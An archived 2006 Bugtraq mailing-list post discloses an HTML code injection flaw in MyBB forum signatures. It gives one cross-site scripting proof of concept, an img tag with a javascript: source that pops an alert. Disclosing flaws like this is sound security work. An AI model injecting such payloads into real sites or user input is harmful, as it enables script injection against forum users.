[42311] in bugtraq
MyBB Signature HTML Code Injection
daemon@ATHENA.MIT.EDU (night_warrior771@securityfocus.com)
Wed Jan 18 19:42:24 2006
Date: 18 Jan 2006 20:34:36 -0000
Message-ID: <20060118203436.3006.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: night_warrior771@securityfocus.com, "[at]"@securityfocus.com,
hotmail.com@securityfocus.com
To: bugtraq@securityfocus.com
##Night_Warrior<Kurdish Hacker>
##night_warrior771[at]hotmail.com
##MyBB Signature HTML Code Injection
##http://www.mybboard.com/
example:
<img src=javascript:alert('XSS')>
Contact :night_warrior771[at]hotmail.com
Night_Warrior<Kurdihs Hacker>